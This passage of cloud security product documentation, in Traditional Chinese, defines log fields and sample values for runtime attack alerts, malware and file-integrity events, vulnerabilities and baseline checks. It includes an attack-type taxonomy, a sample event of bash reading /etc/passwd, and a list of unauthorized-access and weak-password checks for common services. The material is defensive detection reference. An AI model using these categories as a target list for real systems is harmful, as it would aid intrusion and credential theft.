final_action	警示處理結果。取值： block：防護，即阻斷。 monitor：監控。	block
rule_action	規則指定的警示處理方式。取值： block。 monitor。	block
risk_level	風險層級。取值： high。 medium。 low。	high
stacktrace	堆棧資訊。	[java.io.FileInputStream.<init>(FileInputStream.java:123), java.io.FileInputStream.<init>(FileInputStream.java:93), com.example.vulns.controller.FileController.IORead(FileController.java:75), sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method), sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)......]
time	觸發警示的時間。	2023-10-09 15:19:15
timestamp	觸發警示的時間戳記，單位為毫秒。	1696835955070
type	攻擊類型。取值： attach：惡意Attach。 beans：惡意beans綁定。 classloader：惡意類載入。 dangerous_protocol：危險協議使用。 dns：惡意DNS查詢。 engine：引擎注入。 expression：運算式注入。 file：惡意檔案讀寫。 file_delete：任意檔案刪除。 file_list：目錄遍曆。 file_read：任意檔案讀取。 file_upload：惡意檔案上傳。 jndi：JNDI注入。 jni：JNI注入。 jstl：JSTL任意檔案包含。 memory_shell：記憶體馬注入。 rce：命令執行。 read_object：還原序列化攻擊。 reflect：惡意反射調用。 sql：SQL注入。 ssrf：惡意外連。 thread_inject：線程注入。 xxe：XXE攻擊。	rce
url	請求URL。	http://127.0.0.1:999/xxx
rasp_attack_uuid	攻擊事件UUID。	18823b23-7ad4-47c0-b5ac-e5f036a2****
uuid	主機UUID。	23f7ca61-e271-4a8e-bf5f-165596a16****
internet_ip	主機公網IP地址。	1.2.XX.XX
intranet_ip	主機私網IP地址。	172.16.XX.XX
sas_group_name	Security Center伺服器分組名稱。	分組1
instance_id	主機執行個體ID。	i-wz995eivg28f1m**
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

惡意檔案檢測日誌

欄位名	說明	樣本
bucket_name	Bucket名稱。	***-test
event_id	警示ID。	802210
event_name	警示名稱。	挖礦程式
md5	檔案的MD5值。	6bc2bc******53d409b1
sha256	檔案的SHA256值。	f038f9525******7772981e87f85
result	檢測結果。取值： 0：檔案安全。 1：存在惡意檔案。	0
file_path	檔案路徑。	test.zip/bin_test
etag	OSS檔案標識。	6BC2B******853D409B1
risk_level	風險等級。取值： serious：緊急。 suspicions：可疑。 remind：提醒。	remind
source	檢測情境。取值： OSS：在Security Center控制台執行對阿里雲Object Storage ServiceBucket內檔案的檢測。 API：通過SDK接入的方式檢測惡意檔案，支援通過Java或Python方式接入。	OSS
parent_md5	父類檔案或壓縮包檔案的MD5值。	3d0f8045bb9******
parent_sha256	父類檔案或壓縮包檔案的SHA256值。	69b643d6******a3fb859fa
parent_file_path	父類檔案或壓縮包檔案的名稱。	test.zip
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

核心檔案監控事件記錄

欄位名	說明	樣本
start_time	事件的最新發生時間。單位為秒。	1718678414
uuid	用戶端的UUID。	5d83b26b-ba-4a-9267-12****
file_path	檔案路徑。	/etc/passwd
proc_path	進程路徑。	/usr/bin/bash
rule_id	命中規則ID。	123
rule_name	規則名稱。	file_test_rule
cmdline	命令列。	bash /opt/a
operation	對檔案的操作。	READ
risk_level	警示等級。	2
pid	進程ID。	45324
proc_permission	進程許可權。	rwxrwxrwx
instance_id	執行個體ID。	i-wz995eivg2****
internet_ip	互連網IP。	192.0.2.1
intranet_ip	私網IP。	172.16.0.1
instance_name	執行個體名稱。	aegis-test
platform	作業系統類型。	Linux

無代理檢測日誌

漏洞、基準、惡意樣本通用欄位

欄位名	說明	樣本
uuid	伺服器UUID。	ad66133a-dc82-4e5e-9659-a49e3****
instance_id	執行個體ID。	i-2zeg4zldn8zypsfg****
internet_ip	資產的公網IP。	39.104.XX.XX
intranet_ip	資產的私網IP。	192.168.XX.XX
sas_group_name	伺服器在Security Center的資產分組。	default
start_time	開始時間戳，單位秒，也用於表示事件發生的時間。	1719472214

漏洞風險欄位

欄位名	說明	樣本
vul_name	漏洞名稱。	imgsca:java:gson:AVD-2022-25647
vul_alias_name	漏洞別名	gson 代碼問題漏洞（CVE-2022-25647）
vul_primary_id	漏洞業務主鍵ID。	990174361
type	漏洞類型。取值： sys：Windows系統漏洞。 cve：Linux軟體漏洞。 sca：應用漏洞（軟體成分分析類型）。 emg：緊急漏洞。	sca
alert_level	漏洞風險等級。取值： asap：高 later：中 nntf：低	asap
instance_name	主機名稱。	hhht-linux-***
operation	漏洞的處理動作。取值： new：新增 update：更新	new
status	漏洞狀態資訊。取值： 1：未修複 7：已修複	1
tag	漏洞的標籤。取值： oval：Linux軟體漏洞。 system：Windows系統漏洞。說明其他類型的漏洞的標籤為隨機字串。	oval

基準檢查欄位

欄位名	說明	樣本
check_item_name	檢查項名稱。	設定密碼失效時間
check_item_level	檢查項風險層級。取值： high：高危 medium：中危 low：低危	high
check_type	檢查項類型。	身份鑒別
risk_level	風險項層級。取值： high：高危 medium：中危 low：低危	low
operation	操作資訊。取值： new：新增。 update：更新。	new
risk_name	存在風險的檢查項名稱。	密碼原則合規檢測
status	檢查項狀態資訊。取值： 1：未通過 3：已通過	1
sub_type_alias_name	子類型別名（中文）。	阿里雲標準-CentOS Linux 7/8安全基準
sub_type_name	基準子類型名稱。基準子類型取值請參見基準類型及子類型列表。	hc_centos7
type_name	類型名稱。	hc_best_secruity
type_alias_name	類型別名（中文）。	最佳安全實踐
container_id	容器ID。	b564567427272d46f9b1cc4ade06a85fdf55075c06fdb870818d5925fa86****
container_name	容器名稱。	k8s_gamify-answer-bol_gamify-answer-bol-5-6876d5dc78-vf6rb_study-gamify-answer-bol_483a1ed1-28b7-11eb-bc35-00163e01****_0

惡意樣本欄位

欄位名	說明	樣本
alert_level	警示事件的危險等級。取值： serious：緊急。 suspicious：可疑。 remind：提醒。	suspicious
alert_name	惡意樣本警示名稱。	Suspicious Process-SSH-based
operation	操作資訊。取值： new：新增。 update：更新。	new
status	惡意樣本風險狀態資訊。取值： 0：未處理 3：已加白	0
suspicious_event_id	警示事件ID。	909361

敏感檔案欄位

欄位名	說明	樣本
alert_level	風險等級。取值： high：高危 medium：中危 low：低危	high
rule_name	檔案類型名。	ionic令牌
file_path	敏感檔案路徑。	/Windows/Microsoft.NET/assembly/GAC_MSIL/System.WorkflowServices/v4.0_4.0.0.0__31bf3856ad36****/System.WorkflowServices.dll
result	檢查結果。	{"result":"[\"[\\\"mysql-uqjtwadmin-xxx"}

附錄

基準類型及子類型列表

類型名稱	子類型名稱	描述
hc_exploit	hc_exploit_redis	高危風險利用-Redis未授權訪問高危風險
	hc_exploit_activemq	高危風險利用-ActiveMQ未授權訪問高危風險
	hc_exploit_couchdb	高危風險利用-CouchDB未授權訪問高危風險
	hc_exploit_docker	高危風險利用-Docker未授權訪問高危風險
	hc_exploit_es	高危風險利用-Elasticsearch未授權訪問高危風險
	hc_exploit_hadoop	高危風險利用-Hadoop未授權訪問高危風險
	hc_exploit_jboss	高危風險利用-Jboss未授權訪問高危風險
	hc_exploit_jenkins	高危風險利用-Jenkins未授權訪問高危風險
	hc_exploit_k8s_api	高危風險利用Kubernetes-Apiserver未授權訪問高危風險
	hc_exploit_ldap	高危風險利用-LDAP未授權訪問高危風險（Windows環境）
	hc_exploit_ldap_linux	高危風險利用-openLDAP未授權訪問高危風險（Linux環境）
	hc_exploit_memcache	高危風險利用-Memcached未授權訪問高危風險
	hc_exploit_mongo	高危風險利用-Mongodb未授權訪問高危風險
	hc_exploit_pgsql	高危風險利用-Postgresql未授權訪問高危風險基準
	hc_exploit_rabbitmq	高危風險利用-RabbitMQ未授權訪問高危風險
	hc_exploit_rsync	高危風險利用-rsync未授權訪問高危風險
	hc_exploit_tomcat	高危風險利用-Apache Tomcat AJP檔案包含漏洞風險
	hc_exploit_zookeeper	高危風險利用-ZooKeeper未授權訪問高危風險
hc_container	hc_docker	阿里雲標準-Docker安全基準檢查
	hc_middleware_ack_master	國際通用安全最佳實務-Kubernetes(ACK) Master節點安全基準檢查
	hc_middleware_ack_node	國際通用安全最佳實務-Kubernetes(ACK) Node節點安全基準檢查
	hc_middleware_k8s	阿里雲標準-Kubernetes-Master安全基準檢查
	hc_middleware_k8s_node	阿里雲標準-Kubernetes-Node安全基準檢查
cis	hc_suse 15_djbh	等保三級-SUSE 15合規基準檢查
	hc_aliyun_linux3_djbh_l3	等保三級-Alibaba Cloud Linux 3合規基準檢查
	hc_aliyun_linux_djbh_l3	等保三級-Alibaba Cloud Linux/Aliyun Linux 2合規基準檢查
	hc_bind_djbh	等保三級-Bind合規基準檢查
	hc_centos 6_djbh_l3	等保三級-CentOS Linux 6合規基準檢查
	hc_centos 7_djbh_l3	等保三級-CentOS Linux 7合規基準檢查
	hc_centos 8_djbh_l3	等保三級-CentOS Linux 8合規基準檢查
	hc_debian_djbh_l3	等保三級-Debian Linux 8/9/10合規基準檢查
	hc_iis_djbh	等保三級-IIS合規基準檢查
	hc_informix_djbh	等保三級-Informix合規基準檢查
	hc_jboss_djbh	等保三級-Jboss合規基準檢查
	hc_mongo_djbh	等保三級-MongoDB合規基準檢查
	hc_mssql_djbh	等保三級-SQL Server合規基準檢查
	hc_mysql_djbh	等保三級-MySql合規基準檢查
	hc_nginx_djbh	等保三級-Nginx合規基準檢查
	hc_oracle_djbh	等保三級-Oracle合規基準檢查
	hc_pgsql_djbh	等保三級-PostgreSql合規基準檢查
	hc_redhat 6_djbh_l3	等保三級-Redhat Linux 6合規基準檢查
	hc_redhat_djbh_l3	等保三級-Redhat Linux 7合規基準檢查
	hc_redis_djbh	等保三級-Redis合規基準檢查
	hc_suse 10_djbh_l3	等保三級-SUSE 10合規基準檢查
	hc_suse 12_djbh_l3	等保三級-SUSE 12合規基準檢查
	hc_suse_djbh_l3	等保三級-SUSE 11合規基準檢查
	hc_ubuntu 14_djbh_l3	等保三級-Ubuntu 14合規基準檢查
	hc_ubuntu_djbh_l3	等保三級-Ubuntu 16/18/20合規基準檢查
	hc_was_djbh	等保三級-Websphere Application Server合規基準檢查
	hc_weblogic_djbh	等保三級-Weblogic合規基準檢查
	hc_win 2008_djbh_l3	等保三級-Windows 2008 R2合規基準檢查
	hc_win 2012_djbh_l3	等保三級-Windows 2012 R2合規基準檢查
	hc_win 2016_djbh_l3	等保三級-Windows 2016/2019 合規基準檢查
	hc_aliyun_linux_djbh_l2	等保二級-Alibaba Cloud Linux/Aliyun Linux 2合規基準檢查
	hc_centos 6_djbh_l2	等保二級-CentOS Linux 6合規基準檢查
	hc_centos 7_djbh_l2	等保二級-CentOS Linux 7合規基準檢查
	hc_debian_djbh_l2	等保二級-Debian Linux 8合規基準檢查
	hc_redhat 7_djbh_l2	等保二級-Redhat Linux 7合規基準檢查
	hc_ubuntu_djbh_l2	等保二級-Ubuntu16/18合規基準檢查
	hc_win 2008_djbh_l2	等保二級-Windows 2008 R2合規基準檢查
	hc_win 2012_djbh_l2	等保二級-Windows 2012 R2合規基準檢查
	hc_win 2016_djbh_l2	等保二級-Windows 2016/2019 合規基準檢查
	hc_aliyun_linux_cis	國際通用安全最佳實務-Alibaba Cloud Linux/Aliyun Linux 2安全基準檢查
	hc_centos 6_cis_rules	國際通用安全最佳實務-CentOS Linux 6安全基準檢查
	hc_centos 7_cis_rules	國際通用安全最佳實務-CentOS Linux 7安全基準檢查
	hc_centos 8_cis_rules	國際通用安全最佳實務-CentOS Linux 8安全基準檢查
	hc_debian 8_cis_rules	國際通用安全最佳實務-Debian Linux 8安全基準檢查
	hc_ubuntu 14_cis_rules	國際通用安全最佳實務-Ubuntu 14安全基準檢查
	hc_ubuntu 16_cis_rules	國際通用安全最佳實務-Ubuntu 16/18/20安全基準檢查
	hc_win 2008_cis_rules	國際通用安全最佳實務-Windows Server 2008 R2安全基準檢查
	hc_win 2012_cis_rules	國際通用安全最佳實務-Windows Server 2012 R2安全基準檢查
	hc_win 2016_cis_rules	國際通用安全最佳實務-Windows Server 2016/2019 R2安全基準檢查
	hc_kylin_djbh_l3	等保三級-麒麟合規基準檢查
	hc_uos_djbh_l3	等保三級-Uos合規基準檢查
hc_best_security	hc_aliyun_linux	阿里雲標準-Alibaba Cloud Linux/Aliyun Linux 2安全基準檢查
	hc_centos 6	阿里雲標準-CentOS Linux 6安全基準檢查
	hc_centos 7	阿里雲標準-CentOS Linux 7/8安全基準檢查
	hc_debian	阿里雲標準-Debian Linux 8/9/10安全基準檢查
	hc_redhat 6	阿里雲標準-Redhat Linux 6安全基準檢查
	hc_redhat 7	阿里雲標準-Redhat Linux 7/8安全基準檢查
	hc_ubuntu	阿里雲標準-Ubuntu安全基準檢查
	hc_windows_2008	阿里雲標準-Windows 2008 R2安全基準檢查
	hc_windows_2012	阿里雲標準-Windows 2012 R2安全基準檢查
	hc_windows_2016	阿里雲標準-Windows 2016/2019 安全基準檢查
	hc_db_mssql	阿里雲標準-SQL server安全基準檢查
	hc_memcached_ali	阿里雲標準-Memcached安全基準檢查
	hc_mongodb	阿里雲標準-MongoDB 3.x版本安全基準檢查
	hc_mysql_ali	阿里雲標準-Mysql安全基準檢查
	hc_oracle	阿里雲標準-Oracle 11g安全基準檢查
	hc_pgsql_ali	阿里雲標準-PostgreSql安全基準檢查
	hc_redis_ali	阿里雲標準-Redis安全基準檢查
	hc_apache	阿里雲標準-Apache安全基準檢查
	hc_iis_8	阿里雲標準-IIS 8安全基準檢查
	hc_nginx_linux	阿里雲標準-Nginx安全基準檢查
	hc_suse 15	阿里雲標準-SUSE Linux 15安全基準檢查
	tomcat 7	阿里雲標準-Apache Tomcat 安全基準檢查
weak_password	hc_mongodb_pwd	弱口令-MongoDB登入弱口令檢測（支援2.x版本）
	hc_weakpwd_ftp_linux	弱口令-FTP登入弱口令檢查
	hc_weakpwd_linux_sys	弱口令-Linux系統登入弱口令檢查
	hc_weakpwd_mongodb 3	弱口令-MongoDB登入弱口令檢測
	hc_weakpwd_mssql	弱口令-SQL Server資料庫登入弱口令檢查
	hc_weakpwd_mysql_linux	弱口令-Mysql資料庫登入弱口令檢查
	hc_weakpwd_mysql_win	弱口令-Mysql資料庫登入弱口令檢查（Windows版）
	hc_weakpwd_openldap	弱口令-Openldap登入弱口令檢查
	hc_weakpwd_oracle	弱口令-Oracle登入弱口令檢測
	hc_weakpwd_pgsql	弱口令-PostgreSQL資料庫登入弱口令檢查
	hc_weakpwd_pptp	弱口令-pptpd服務登入弱口令檢查
	hc_weakpwd_redis_linux	弱口令-Redis資料庫登入弱口令檢查
	hc_weakpwd_rsync	弱口令-rsync服務登入弱口令檢查
	hc_weakpwd_svn	弱口令-svn服務登入弱口令檢查
	hc_weakpwd_tomcat_linux	弱口令-Apache Tomcat控制台弱口令檢查
	hc_weakpwd_vnc	弱口令-VncServer弱口令檢查
	hc_weakpwd_weblogic	弱口令-Weblogic 12c登入弱口令檢測
	hc_weakpwd_win_sys	弱口令-Windows系統登入弱口令檢查